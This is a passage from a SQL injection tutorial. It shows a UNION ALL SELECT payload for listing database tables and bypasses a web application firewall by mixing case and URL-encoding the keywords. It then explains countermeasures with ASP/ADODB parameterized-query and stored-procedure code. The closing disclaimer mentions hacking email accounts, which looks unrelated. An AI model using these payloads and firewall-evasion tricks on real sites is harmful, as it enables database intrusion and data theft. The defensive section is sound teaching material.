2. Make an obfuscated version of your injected payload.

3. Test it and watch for the WAF/Application response.

4. If it does not work, modify it and try step 2.

I’ve set up WAF to prevent us from using UNION ALL SELECT in part 3 we used it to gain more details:
admin' UNION ALL SELECT name from sysobjects where type = 'u'--

So let’s try to do the same thing with the WAF enabled:

[Image: f12.png]

As you can see it’s claiming page cannot be found, remember that this could also be a friendly error, rather than the error page you’re seeing above, the important thing here is that I’m getting a result of not found, when I know the page exists, since it works fine when I don’t use UNION ALL SELECT so let’s try to bypass that with an uppercase/lowercase combination like this:
UnioN All selEcT

[Image: f13.png]

Same result, so clearly they either have it in the exact case we used, or case doesn’t matter, but no big deal, let’s try something a bit more concealed:
UnioN%20All%20selEcT

And there we have it, WAF bypassed. Although this was a pretty typical and extremely silly WAF to bypass, the concept remains exactly the same for 99% of all WAFs out there. Just find new and interesting ways to effectively write the same thing and you should be good to go.

Countermeasures

So here’s the big question, we’ve seen SQLi at work here, but how do you prevent your own code from being hit by the attacks we’ve covered here?

You’ll find multiple sources tell you that simply doubling up on quotes will do the trick, but this completely ignores truncation errors. Sure truncation injections are a really rare breed, but they should not be ignored simply because it is rare. The same goes for most functions that are used to make strings “SQL safe” sure this adds an extra layer of protection, but so did the pretty weak WAF we used in our example.

There are 2 main things to adhere to which should prevent SQL injection completely and is actually practical enough for large applications:

1) Validation.

2) Parameterized queries.
By adhering to those 2 none of the SQL injections we used above would have worked, literally none. When you validate that numbers are indeed numbers there is no way to inject it. You cannot inject SQL when you have in your arsenal are numbers. The query will be executed correctly every single time. The main problem with this, would be when facing string based injections, since we can’t simply make sure everything is numbers, this is where prepared statements come into play, consider the following code:
Code:

strSQL = "SELECT * FROM users WHERE username=? AND password=?"

Dim cmd1

Set cmd1 = Server.CreateObject("ADODB.Command")

cmd1.ActiveConnection = cnnLogin

cmd1.CommandText = strSQL

cmd1.CommandType = adCmdText

cmd1.Parameters(0) = Request.Form("login")

cmd1.Parameters(1) = Request.Form("password")

Set rstLogin = cmd1.Execute()


The above code is still using a dynamic SQL command, however, in the above example the values are passed as parameters and that nasty SQLi issue is taken care of completely since the entire value is encapsulated and a single quote won’t break out of the string literal.

An even better way to do this, would be to utilize a stored procedure, we’ve included that code below:

Code:

Dim cmd2
    
    Set cmd2 = Server.CreateObject("ADODB.Command")
    
    cmd2.ActiveConnection = cnnLogin
    
    cmd2.CommandText = "login_sp"
    
    cmd2.CommandType = adCmdStoredProc
    
    cmd2.Parameters(1).Value = Request.Form("login")
    
    cmd2.Parameters(2).Value = Request.Form("password")
    
    Set rstLogin = cmd2.Execute

Using either of these techniques, SQL injection goes completely out of the window and your site won’t be affected. Those 2 simple rules will keep you safe, it really is a lot of work, but doing proper validation and interacting with SQL in a secure way, is really all it takes.

Note: This tutorial is only for Educational Purposes, I did not take any responsibility of any misuse, you will be solely responsible for any misuse that you do. Hacking email accounts is criminal activity and is punishable under cyber crime and you may get upto 40 years of imprisonment, if got caught in doing so.